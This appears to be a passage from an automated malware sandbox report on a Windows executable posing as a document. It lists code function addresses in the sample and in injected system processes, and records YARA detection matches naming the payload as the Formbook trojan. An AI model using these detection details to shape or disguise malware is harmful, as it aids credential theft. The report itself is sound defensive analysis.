Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00E00AE2	0_2_00E00AE2
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DB6A94	0_2_00DB6A94
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00D98A0E	0_2_00D98A0E
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DE8B13	0_2_00DE8B13
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DDEB07	0_2_00DDEB07
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DACD61	0_2_00DACD61
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DB7006	0_2_00DB7006
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00D93190	0_2_00D93190
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00D9710E	0_2_00D9710E
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00D81287	0_2_00D81287
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DA33C7	0_2_00DA33C7
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DAF419	0_2_00DAF419
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DA16C4	0_2_00DA16C4
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00D95680	0_2_00D95680
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DA78D3	0_2_00DA78D3
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00D958C0	0_2_00D958C0
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DA1BB8	0_2_00DA1BB8
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DB9D05	0_2_00DB9D05
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00D8FE40	0_2_00D8FE40
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DA1FD0	0_2_00DA1FD0
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DABFE6	0_2_00DABFE6
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_018C35E0	0_2_018C35E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E28F	2_2_0041E28F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041DB1D	2_2_0041DB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041DC79	2_2_0041DC79
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E57F	2_2_0041E57F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402D88	2_2_00402D88
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041DDB7	2_2_0041DDB7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00409E4B	2_2_00409E4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00409E50	2_2_00409E50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D770	2_2_0041D770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FA352	2_2_036FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364E3F0	2_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037003E6	2_2_037003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C02C0	2_2_036C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C8158	2_2_036C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03630100	2_2_03630100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DA118	2_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F81CC	2_2_036F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F41A2	2_2_036F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037001AA	2_2_037001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D2000	2_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03664750	2_2_03664750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363C7C0	2_2_0363C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365C6E0	2_2_0365C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640535	2_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03700591	2_2_03700591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F2446	2_2_036F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E4420	2_2_036E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036EE4F6	2_2_036EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FAB40	2_2_036FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F6BD7	2_2_036F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03656962	2_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0370A9A6	2_2_0370A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364A840	2_2_0364A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03642840	2_2_03642840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E8F0	2_2_0366E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036268B8	2_2_036268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B4F40	2_2_036B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03682F28	2_2_03682F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03660F30	2_2_03660F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E2F30	2_2_036E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364CFE0	2_2_0364CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03632FC8	2_2_03632FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BEFA0	2_2_036BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640E59	2_2_03640E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FEE26	2_2_036FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FEEDB	2_2_036FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03652E90	2_2_03652E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FCE93	2_2_036FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364AD00	2_2_0364AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DCD1F	2_2_036DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363ADE0	2_2_0363ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03658DBF	2_2_03658DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640C00	2_2_03640C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03630CF2	2_2_03630CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0CB5	2_2_036E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362D34C	2_2_0362D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F132D	2_2_036F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0368739A	2_2_0368739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E12ED	2_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365B2C0	2_2_0365B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036452A0	2_2_036452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0367516C	2_2_0367516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362F172	2_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0370B16B	2_2_0370B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364B1B0	2_2_0364B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F70E9	2_2_036F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FF0E0	2_2_036FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036EF0CC	2_2_036EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036470C0	2_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FF7B0	2_2_036FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03685630	2_2_03685630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F16CC	2_2_036F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F7571	2_2_036F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037095C3	2_2_037095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DD5B0	2_2_036DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03631460	2_2_03631460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FF43F	2_2_036FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FFB76	2_2_036FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B5BF0	2_2_036B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0367DBF9	2_2_0367DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365FB80	2_2_0365FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B3A6C	2_2_036B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FFA49	2_2_036FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F7A46	2_2_036F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036EDAC6	2_2_036EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DDAAC	2_2_036DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03685AA0	2_2_03685AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E1AA3	2_2_036E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03649950	2_2_03649950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365B950	2_2_0365B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D5910	2_2_036D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AD800	2_2_036AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036438E0	2_2_036438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FFF09	2_2_036FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03603FD2	2_2_03603FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03603FD5	2_2_03603FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FFFB1	2_2_036FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03641F92	2_2_03641F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03649EB0	2_2_03649EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F7D73	2_2_036F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03643D40	2_2_03643D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F1D5A	2_2_036F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365FDC0	2_2_0365FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B9C32	2_2_036B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FFCF2	2_2_036FFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5A036	2_2_03B5A036
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5B232	2_2_03B5B232
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B51082	2_2_03B51082
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E5CD	2_2_03B5E5CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B55B30	2_2_03B55B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B55B32	2_2_03B55B32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B58912	2_2_03B58912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B52D02	2_2_03B52D02
Source: C:\Windows\explorer.exe	Code function: 3_2_0EBB8232	3_2_0EBB8232
Source: C:\Windows\explorer.exe	Code function: 3_2_0EBAE082	3_2_0EBAE082
Source: C:\Windows\explorer.exe	Code function: 3_2_0EBB7036	3_2_0EBB7036
Source: C:\Windows\explorer.exe	Code function: 3_2_0EBBB5CD	3_2_0EBBB5CD
Source: C:\Windows\explorer.exe	Code function: 3_2_0EBB2B32	3_2_0EBB2B32
Source: C:\Windows\explorer.exe	Code function: 3_2_0EBB2B30	3_2_0EBB2B30
Source: C:\Windows\explorer.exe	Code function: 3_2_0EBB5912	3_2_0EBB5912
Source: C:\Windows\explorer.exe	Code function: 3_2_0EBAFD02	3_2_0EBAFD02
Source: C:\Windows\explorer.exe	Code function: 3_2_0F432B32	3_2_0F432B32
Source: C:\Windows\explorer.exe	Code function: 3_2_0F432B30	3_2_0F432B30
Source: C:\Windows\explorer.exe	Code function: 3_2_0F438232	3_2_0F438232
Source: C:\Windows\explorer.exe	Code function: 3_2_0F42FD02	3_2_0F42FD02
Source: C:\Windows\explorer.exe	Code function: 3_2_0F435912	3_2_0F435912
Source: C:\Windows\explorer.exe	Code function: 3_2_0F43B5CD	3_2_0F43B5CD
Source: C:\Windows\explorer.exe	Code function: 3_2_0F437036	3_2_0F437036
Source: C:\Windows\explorer.exe	Code function: 3_2_0F42E082	3_2_0F42E082
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_00C9764B	4_2_00C9764B
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_00C9305C	4_2_00C9305C
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_00C9978B	4_2_00C9978B
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04532446	4_2_04532446
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0452E4F6	4_2_0452E4F6
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04480535	4_2_04480535
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04540591	4_2_04540591
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0449C6E0	4_2_0449C6E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044A4750	4_2_044A4750
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04480770	4_2_04480770
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0447C7C0	4_2_0447C7C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04512000	4_2_04512000
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04508158	4_2_04508158
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04470100	4_2_04470100
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0451A118	4_2_0451A118
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_045381CC	4_2_045381CC
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_045401AA	4_2_045401AA
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04520274	4_2_04520274
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_045002C0	4_2_045002C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0453A352	4_2_0453A352
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_045403E6	4_2_045403E6
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0448E3F0	4_2_0448E3F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04480C00	4_2_04480C00
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04470CF2	4_2_04470CF2
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04520CB5	4_2_04520CB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0448AD00	4_2_0448AD00
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0451CD1F	4_2_0451CD1F
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0447ADE0	4_2_0447ADE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04498DBF	4_2_04498DBF
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04480E59	4_2_04480E59
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0453EE26	4_2_0453EE26
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0453EEDB	4_2_0453EEDB
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0453CE93	4_2_0453CE93
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04492E90	4_2_04492E90
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044F4F40	4_2_044F4F40
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044C2F28	4_2_044C2F28
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044A0F30	4_2_044A0F30
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04472FC8	4_2_04472FC8
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0448CFE0	4_2_0448CFE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044FEFA0	4_2_044FEFA0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0448A840	4_2_0448A840
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04482840	4_2_04482840
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044AE8F0	4_2_044AE8F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044668B8	4_2_044668B8
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04496962	4_2_04496962
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044829A0	4_2_044829A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0454A9A6	4_2_0454A9A6
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0447EA80	4_2_0447EA80
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0453AB40	4_2_0453AB40
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04536BD7	4_2_04536BD7
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04471460	4_2_04471460
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0453F43F	4_2_0453F43F
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04537571	4_2_04537571
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0451D5B0	4_2_0451D5B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_045316CC	4_2_045316CC
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0453F7B0	4_2_0453F7B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044870C0	4_2_044870C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0452F0CC	4_2_0452F0CC
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0453F0E0	4_2_0453F0E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_045370E9	4_2_045370E9
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B516C	4_2_044B516C
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0446F172	4_2_0446F172
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0454B16B	4_2_0454B16B
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0448B1B0	4_2_0448B1B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0449B2C0	4_2_0449B2C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_045212ED	4_2_045212ED
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044852A0	4_2_044852A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0446D34C	4_2_0446D34C
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0453132D	4_2_0453132D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044C739A	4_2_044C739A
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044F9C32	4_2_044F9C32
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0453FCF2	4_2_0453FCF2
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04483D40	4_2_04483D40
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04531D5A	4_2_04531D5A
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04537D73	4_2_04537D73
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0449FDC0	4_2_0449FDC0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04489EB0	4_2_04489EB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0453FF09	4_2_0453FF09
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04481F92	4_2_04481F92
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0453FFB1	4_2_0453FFB1
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044ED800	4_2_044ED800
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044838E0	4_2_044838E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04489950	4_2_04489950
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0449B950	4_2_0449B950
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04515910	4_2_04515910
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04537A46	4_2_04537A46
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0453FA49	4_2_0453FA49
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044F3A6C	4_2_044F3A6C
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0452DAC6	4_2_0452DAC6
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044C5AA0	4_2_044C5AA0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04521AA3	4_2_04521AA3
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0451DAAC	4_2_0451DAAC
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0453FB76	4_2_0453FB76
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044BDBF9	4_2_044BDBF9
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044F5BF0	4_2_044F5BF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0449FB80	4_2_0449FB80
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_001BE28D	4_2_001BE28D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_001BE57F	4_2_001BE57F
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_001BD770	4_2_001BD770
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_001BDB1D	4_2_001BDB1D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_001BDC79	4_2_001BDC79
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_001A2D90	4_2_001A2D90
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_001A2D88	4_2_001A2D88
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_001BDDB7	4_2_001BDDB7
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_001A9E50	4_2_001A9E50
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_001A9E4B	4_2_001A9E4B
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_001A2FB0	4_2_001A2FB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0417A036	4_2_0417A036
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04172D02	4_2_04172D02
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0417E5CD	4_2_0417E5CD
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04171082	4_2_04171082
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04178912	4_2_04178912
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0417B232	4_2_0417B232
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04175B32	4_2_04175B32
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04175B30	4_2_04175B30

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 036AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03675130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 036BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0362B970 appears 277 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03687E54 appears 111 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 0446B970 appears 272 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 044EEA12 appears 86 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 044C7E54 appears 101 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 044FF290 appears 105 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 044B5130 appears 58 times
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: String function: 00DA8B40 appears 42 times
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: String function: 00DA0D27 appears 70 times
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: String function: 00D87F41 appears 35 times

Source: 2024 Lusail Fence-WITH STICKER-2-003.exe, 00000000.00000003.1363491368.00000000042B3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 2024 Lusail Fence-WITH STICKER-2-003.exe
Source: 2024 Lusail Fence-WITH STICKER-2-003.exe, 00000000.00000003.1363605464.000000000445D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 2024 Lusail Fence-WITH STICKER-2-003.exe

Source: 2024 Lusail Fence-WITH STICKER-2-003.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 0.2.2024 Lusail Fence-WITH STICKER-2-003.exe.18d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.2024 Lusail Fence-WITH STICKER-2-003.exe.18d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.2024 Lusail Fence-WITH STICKER-2-003.exe.18d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
